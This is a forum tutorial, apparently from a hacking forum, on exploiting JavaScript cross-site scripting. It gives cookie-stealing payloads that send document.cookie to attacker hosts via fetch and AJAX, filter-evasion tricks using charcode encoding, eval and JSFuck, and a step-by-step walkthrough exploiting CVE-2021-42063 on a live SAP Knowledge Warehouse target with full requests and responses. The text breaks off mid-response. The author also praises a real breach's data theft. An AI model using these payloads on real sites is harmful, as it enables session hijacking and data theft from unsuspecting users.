XSS in all its glory [ Part 2 ] [ JavaScript ]

[D2]

XSS[is] JavaScript Damage​

​

This article delves into JavaScript-based XSS, distinguishing it from HTML/CSS injection, and recaps the first part of this series, which focused on HTML/CSS injection. We will see full power of XSS and refer to cases which happened in the past. It is not an "alert(1)" article.

Content​

1. JavaScript Based XSS
2. Understanding JavaScript in Web Applications
3. XSS types
4. JavaScript Functionalities Exploited in XSS Attacks
5. Some XSS Cases
6. Rukopashnaya (Рукопашная)

JavaScript Based XSS​

JavaScript-based XSS is a security exploit where an attacker injects malicious JavaScript code into a web page viewed by other users. Unlike HTML/CSS injection, which alters the structure or style of a webpage, JavaScript XSS targets the functionality, exploiting the dynamic nature of JavaScript.

Key Differences from HTML/CSS Injection​

Scope of Impact: JavaScript can manipulate browser APIs and user session data.
Interactivity: JavaScript XSS can create interactive malicious scripts.
Data Access: JavaScript-based XSS can access sensitive information like cookies and tokens.
The first part of our series explored HTML and CSS injection vulnerabilities. HTML injection affects the page's structure, while CSS injection manipulates visual presentation. These attacks can disrupt a website's layout but generally don't execute malicious scripts or access user data.

Understanding JavaScript in Web Applications​

JavaScript is pivotal in modern web development, driving interactive and dynamic aspects of web applications. However, its features also open avenues for vulnerabilities like XSS.

Asynchronous Operations with AJAX​

AJAX (Asynchronous JavaScript and XML) allows web applications to send and retrieve data from a server asynchronously, without interfering with the display and behavior of the existing page. This means web applications can update content dynamically, leading to a smoother user experience.

Front-End Frameworks and Libraries​

Frameworks like React, Angular, and Vue.js are JavaScript-based. They offer reusable components and reactive data binding, enabling the development of complex, single-page applications. Basically they are wildly used.

Server-Side JavaScript​

With the advent of Node.js, JavaScript can be used not only in client side, but also in server side. This has allowed developers to use a single programming language across the entire stack of web development.

XSS types​

Reflected XSS​

Reflected XSS attacks occur when an attacker sends a malicious script to a user, often through a link. The script is then executed by the user's browser as part of the victim's interaction with the website.

Request sent by user
Код: Скопировать в буфер обмена
http://xacker.mamkin/search?query=<script>alert('XSS')</script>
Server side code:
Код: Скопировать в буфер обмена

var searchQuery = request.getParameter("query");
response.write("<div>Results for " + searchQuery + "</div>");

In this example, the script alert('XSS') is injected into the query parameter and executed when the search results are displayed. The server includes the script in the response without proper sanitization, leading to the execution of the script on the client side.

Stored XSS​

Stored XSS attacks occur when an attacker stores malicious script in a website's database, which is then rendered and executed when other users access the affected page.
Let's say that the attacker sends a request which is stored in the DB, when the user open’s the website the code gets executed.

Code that gets executed in client side:
Код: Скопировать в буфер обмена
<script>fetch('http://xacker.mamkin/?cookie=' + document.cookie)</script>
How it is stored in the client side:
Код: Скопировать в буфер обмена

<div>
 User Comments:
 <p><script>fetch('http://malicious-site.com/?cookie=' + document.cookie)</script></p>
</div>

Here, the attacker's script is stored in the database through a comment form and later rendered on a web page. When other users visit the page, their cookies are sent to the attacker's server.

DOM-based XSS​

DOM-based XSS attacks manipulate the Document Object Model (DOM) of the webpage, often by altering the URL and having JavaScript execute malicious code based on this manipulation.

Request sent by user
Код: Скопировать в буфер обмена
http://xacker.mamkin/#<script>alert('XSS')</script>
Client side JavaScript code
Код: Скопировать в буфер обмена

var fragment = window.location.hash.slice(1);
document.getElementById('content').innerHTML = fragment;

In this example, the JavaScript code takes a fragment of the URL (after the #) and injects it directly into the webpage without sanitization. The script within the URL is executed as a result.

JavaScript Functionalities Exploited in XSS Attacks​

While JavaScript enriches web applications, it also introduces potential security risks. XSS attacks often exploit certain aspects of JavaScript to execute malicious code in a user’s browser.

Manipulating the DOM​

The Document Object Model (DOM) is an API for HTML and XML documents that provides a structured representation of the document and defines how documents can be accessed and manipulated. In XSS attacks, malicious scripts often manipulate the DOM to insert or modify web page content.

For example, let’s say that we have a website like this
Код: Скопировать в буфер обмена

<!DOCTYPE html>
<html>
<head>
    <title>Sample Page</title>
</head>
<body>
    <div id="someElement">Initial Content</div>
</body>
</html>

In the code below, the content is static, so in that code the user won’t be able to change it. But usually in XSS cases, it is taken as input from the user, so it is dynamic. Let’s say that we send a request xss.is/?input={XSScodeHere}.
Код: Скопировать в буфер обмена
document.getElementById('someElement').innerHTML = 'XSScodeHere';
In that case if the web service takes input from the user, JavaScript code dynamically changes the content of a webpage element, which is often used in XSS attacks to inject harmful content.
Код: Скопировать в буфер обмена

<!DOCTYPE html>
<html>
<head>
    <title>Sample Page</title>
</head>
<body>
    <div id="someElement">XSScodeHere</div>
</body>
</html>

In easier language:
When we input, the source code (CTRL+U) won’t change, but the “inspect” that we do from the browser’s developer tools will show edited code. That’s the reason why I want to add chromium support to my tools, but I am still thinking about it as it will also use a lot of power.

P.S. Obviosly we have to replace "XSScodeHere with something malicious, I will give some examples below.

Event Handlers​

JavaScript can assign functions to be executed when specific events occur, such as mouse clicks or keyboard inputs. Attackers can embed malicious code in these event handlers.

In this case, the maliciousFunction could be code that performs unauthorized actions, such as stealing cookies or redirecting the user to a malicious website:
Код: Скопировать в буфер обмена
<button onclick="maliciousFunction()">Click Me</button>
Another very simple example:
Код: Скопировать в буфер обмена
<button onclick="alert(1)">Click Me</button>

AJAX Calls​

AJAX can be exploited to send data to or retrieve data from a malicious server without the user’s knowledge.

This script sends the user’s cookies to a malicious server:
Код: Скопировать в буфер обмена

$.ajax({
 url: 'http://xacker.mamkin/steal-data',
 type: 'POST',
 data: { sensitiveData: document.cookie }
});

Some XSS Cases​

We all know that SQL Injection attacks have more threat to data extraction, basically they have more severity than XSS in most cases. That’s because the XSS usually needs a user interaction. What I am trying to say is that XSS is underrated for WhiteHats and overrated for BlackHats xD. Bug bounty programs won’t pay much for XSS as it requires user interaction, while it can be profitable in “dark” business. Let’s check some cases from the past:

British Airways (2018): British Airways experienced a significant data breach due to an XSS attack executed by Magecart, a well-known hacker group. The group exploited a vulnerability in a JavaScript library called Feedify, which was used on the British Airways website. They modified the script to send customer data to a malicious server, mimicking British Airways' domain, thereby successfully performing credit card skimming on 380,000 booking transactions. The attackers were sophisticated enough to use an SSL certificate for their fake server, making it appear secure to users and browsers.

From WhiteHat’s perspective:
Well it led to 230$ million fine (https://www.reflectiz.com/blog/brit...arty-breach-leads-to-a-230-million-gdpr-fine/), if the vulnerability was reported, the reply probably would be either “The problem is in third party and don’t concern us”, or if WhiteHat reported it as “Use of Unmaintained Third Party Components (CWE-1104)”, then it would be considered as Low or Medium, because exploiting it would be considered as illegal and the impact would probably won’t be much as it wasn’t exploited. The bounty value would have been in range from 5-10k$, these numbers are not “fake”, they are the real deal (https://www.hackerone.com/application-security/reducing-risk-bug-bounty-program).

The conclusion here is that Bug Bounty platforms are great for companies to participate, to avoid this kind of behavior. When it comes to my own thoughts about this, WhiteHats do what they do mostly for their reputation and bounty is like a tip for them.

From BlackHat’s perspective:
I am not a BlackHat, correct me if I am wrong. I think that the BlackHat had to extract the data, otherwise showing the impact would be impossible and it is what they did, so nice move. The question is what happened to that data? I couldn’t find any information in the internet, obviously we know that it was sold, the main question is “To whom?”

Fortnite (2019): The popular online video game Fortnite faced a potential XSS attack, which could have led to a significant data breach. An unsecured, retired web page on the game's site contained a dangerous XSS vulnerability, giving attackers potential access to 200 million users. The attack could have allowed the theft of the game's virtual currency and recorded player conversations, providing valuable information for future attacks. Security researchers from Check Point discovered and reported this vulnerability to Fortnite.

There is a video PoC: As you can see from the video, it requires user interaction, so WhiteHat’s bounty here would be probably the same as it would have been with British Airways, BlackHat’s damage would be a little less than what it was done to British Airways. I guess we will in the future refer to this cases to understand how bad XSS attack was exploited xD

eBay (2015-2016): eBay experienced a severe XSS vulnerability where the website used a "url" parameter for redirection without validating its value. This oversight allowed attackers to inject malicious code into the platform, potentially gaining full access to eBay seller accounts, manipulating product listings, and stealing payment details. This vulnerability was actively exploited by attackers to manipulate high-value product listings, such as vehicles.

Vulnerability in British Airways was actually stored even though related to third party components, vulnerability in EpicGames was in its own domain, it was a CORS issue. If I understood the news correctly, the URL parameter was used to inject an iframe to a malicious website, so it is more of a CSP issue here. There is no normal source for me to give the exact information, but I am pretty sure that it is probably in the same level as vulnerability in Fortnite, or maybe slightly higher level, because it is in main domain. But in these cases that matters for WhiteHats rather than for BlackHats, that’s because BlackHats will probably use shortlink, because reflected XSS for stealing data will use a “suspicious” payload, it will be long, so in cases with Fortnite and Ebay, they should be same in eyes of a BlackHat (I think), for WhiteHat, eBay is more severe as it is in main domain, we don’t care how big payload can get, there is no “length of payload” in CVSS score xD

Now I have got an idea, we should create our own score and add “Length of Payload”, because it matters. I will call it XSS, eXploitation Severity Score.

Bypassing Input Sanitization​

Attackers constantly develop sophisticated techniques to bypass client-side sanitization and security measures. Obviously there are a lot of methods for that and the ones I explain here are just parts of what is in the wild. We can see people daily doing X (twitter) posts, with Cloudflare/Akamai bypass, even though copy-pasting them can work sometimes, bypasses are done through manual tests, by understanding what gets blocked/sanitized.

Using Advanced Encoding​

Browsers can interpret various encodings, and attackers often use this feature to “hide” payloads.
Код: Скопировать в буфер обмена
<script>alert('XSS');</script>
This basic XSS injection might be blocked by sanitization filters. However, using hexadecimal or base64 encoding could bypass the filters:
Код: Скопировать в буфер обмена
<script>alert(String.fromCharCode(88,83,83));</script>
You can see a lot of payloads like this, point here is not to “hide” the “XSS”, but to hide the “alert” itself, as far as I know, html/url encoding is also used. I haven’t used any encoding for XSS bypass.

Obfuscating Scripts​

Obfuscation involves disguising the malicious script to evade detection.
Код: Скопировать в буфер обмена
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">
The onerror event triggers an eval() function, which executes the decoded script, displaying an alert with 'XSS'.

Obfuscating method that almost always works for me is use of JSFuck (https://jsfuck.com):
Код: Скопировать в буфер обмена

<script>
[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])
<script>

It translates as:
Код: Скопировать в буфер обмена
<script>alert(1)</script>

Utilizing HTML5 Attributes​

HTML5 introduced several new attributes which could be used to exploit XSS.
Код: Скопировать в буфер обмена
<audio src="malicious.mp3" onerror="alert('XSS')"></audio>
I have explained it in the previous article - https://xss.is/threads/103323/.

Rukopashnaya (Рукопашная)​

Everything written above, is just basics, cases are different. I will explain hunting in the wild the way I do it. It can be through 2 ways, automated (or as I call it ak47), or manual (rukopashnaya). I have explain automation with kXSS and Bablo, so I will talk about other stuff. We all play with Nuclei sometimes, and they have a template for CVE-2021-42063. Let's check what is in there. I have a vulnerabe target and I will analyze in black box way. It may be the strangest analysis of an exploit.

The Template:
Код: Скопировать в буфер обмена

id: CVE-2021-42063

info:
  name: SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting
  author: pdteam
  severity: medium
  description: |
    SAP Knowledge Warehouse 7.30, 7.31, 7.40, and 7.50 contain a reflected cross-site scripting vulnerability via the usage of one SAP KW component within a web browser.
  remediation: |
    Upgrade to a patched version of SAP Knowledge Warehouse (>=7.5.1) to mitigate the XSS vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2022/Mar/32
    - https://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html
    - https://twitter.com/MrTuxracer/status/1505934549217382409
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42063
    - http://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-42063
    cwe-id: CWE-79
    epss-score: 0.00491
    epss-percentile: 0.73418
    cpe: cpe:2.3:a:sap:knowledge_warehouse:7.30:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: knowledge_warehouse
    shodan-query: http.favicon.hash:-266008933
    zoomeye-query: +app:"SAP NetWeaver Application Server httpd
  tags: cve2021,sap,xss,seclists,packetstorm,cve

http:
  - method: GET
    path:
      - "{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>"
          - "SAPIKS2"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

What can we analyze from it, so we can see that the payload is <SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>. I have the following questions in my mind:
1. Why is it HTML encoded?
2. Why is it uppercase?
3. Why it ends with .asp, what if i remove it?

Let's check it with my vulnerable target, my request:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/PirivetPirivet.asp HTTP/2
Response:
Код: Скопировать в буфер обмена

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="refresh"      content="0; URL=/SAPIKS2/logonFromUrl.sap?null&_CLASS=RANDOM/SAPIREXTHELP/RANDOM/PIRIVETPIRIVET">
</head>
<body>
</body>
</html>

This shows that no matter what I input, output will be in uppercase and JavaScript is case sensitive, which means that payloads in uppercase won't work, let's aim for HTML Injection first. But before that I will remove the .asp
Request:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/PirivetPirivet HTTP/2
Response:
Код: Скопировать в буфер обмена
HTTP/2 404 Not Found
Okay, so it must end with .asp, time for HTML Injection:
Request:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><h1>test</h1>.asp HTTP/2
Response:

Image [1]​

As we can see from the screenshot, HTML Injection works and we were able to escape meta tag. Now we have multiple ways to exploit this vulnerability, I will use a bit different approach, before me starting with different approach, let's check JSFuck. I am starting with JSFuck because other simple/basic paylaods won't work as they will get uppercase.
Request:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><script>[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])</script>.asp HTTP/2
Response:
Код: Скопировать в буфер обмена
HTTP/2 403 Forbidden
I think that problem is with "script" tag, so let's change it to "img" tag.
Request:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img%20src=x%20onerror=[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])>.asp HTTP/2
Response:
Код: Скопировать в буфер обмена

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="refresh"      content="0; URL=/SAPIKS2/logonFromUrl.sap?null&_CLASS=RANDOM/SAPIREXTHELP/RANDOM/"><IMG SRC=X ONERROR=[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]